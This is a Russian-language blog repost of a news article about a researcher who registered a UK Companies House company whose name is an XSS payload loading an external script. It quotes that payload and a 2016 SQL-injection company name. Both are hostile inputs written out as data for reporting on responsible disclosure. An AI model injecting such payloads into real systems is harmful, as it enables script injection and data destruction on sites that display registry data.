Share This
Связаться со мной
Крути в низ
Categories
//В британском реестре компаний обнаружили XSS

В британском реестре компаний обнаружили XSS

28.10.2020Category : My Habr

v britanskom reestre kompanij obnaruzhili xss cfd4690 - В британском реестре компаний обнаружили XSS

Выпуск комикса XKCD 327 «Мамины эксплойты» в переводе xkcd.ru

20 октября некто Джим Уокер поделился на форуме разработчиков британского государственного реестра компаний Companies House интересным наблюдением. Companies House допускает в именах компаний символы < и >. Это открывает простор для атак на тех сайтах, которые не фильтруют и не экранируют управляющие символы корректным образом. Если сайт отображает название компании и не санитизирует данные, то он потенциально уязвим к XSS-атаке.

Уокер обнаружил, что 16 октября некий Майк Джон Тэнди зарегистрировал компанию с названием "><SCRIPT SRC=HTTPS://MJT.XSS.HT></SCRIPT> LTD. Если XSS-фильтра нет, то такое имя компании внедряет на веб-страницу код, который вызывает внешний JavaScript.

v britanskom reestre kompanij obnaruzhili xss c3b3589 - В британском реестре компаний обнаружили XSS

На данный момент из сообщения Джима Уокера название компании удалено, но остались скриншоты.

22 октября регулятор разослал своим партнёрам предупреждение о «компании 12956509». Письмо аккуратно избегает упоминаний настоящего имени. Компанию называют по номеру в базе данных.

В письме сотрудники дают краткий ликбез о природе XSS-атак и предупреждают о возможных рисках безопасности.

v britanskom reestre kompanij obnaruzhili xss dfce9bd - В британском реестре компаний обнаружили XSS

Companies House по максимуму скрыла имя компании. Как заметили в Twitter, даже выписка об учреждении 12956509 в поле имени содержала: «Имя компании предоставляется по запросу».

v britanskom reestre kompanij obnaruzhili xss f1d75e9 - В британском реестре компаний обнаружили XSS

Сам виновник события объявился в треде Джима Уокера 23 октября, через трое суток после находки. Майкл Тэнди объяснил, что раскрывать информацию на публичном форуме с его стороны было бы безответственно, поэтому с Companies House он связался через тикет техподдержки.

Уязвимы ресурсы, которые получают информацию из реестра Compаnies House. Майкл рассказал, что он уже связывается со всеми сайтами, которые вызвали его скрипт. Как посетовал исследователь безопасности, уязвимые к XSS сайты редко размещают контакты для связи и не имеют аккаунт на сервисах по типу HackerOne.

На форуме сотрудники Company House подтвердили, что получили сообщения Тэнди. Имя «компании 12956509» сменилось на THAT COMPANY WHOSE NAME USED TO CONTAIN HTML SCRIPT TAGS LTD (буквально «та компания, у которой в имени были тэги HTML»). Неизвестно, исправлена ли уязвимость в системах Company House. Возможно, реестр ввёл специальные ограничения на имена.

В реестре Companies House попытки инъекций кода находят уже не впервые. В 2016 году под номером 10542519 появилась компания с SQL-инъекцией ; DROP TABLE "COMPANIES";– LTD.

  • 2 views
  • 0 Comment

Leave a Reply

Ваш адрес email не будет опубликован. Обязательные поля помечены *

Этот сайт использует Akismet для борьбы со спамом. Узнайте, как обрабатываются ваши данные комментариев.

Свежие комментарии

    Рубрики

    About Author 01.

    Roman Spiridonov
    Roman Spiridonov

    Привет ! Мне 38 лет, я работаю в области информационных технологий более 4 лет. Тут собрано самое интересное.

    Our Instagram 04.

    Categories 05.

    © Speccy 2020 / All rights reserved

    Связаться со мной
    Close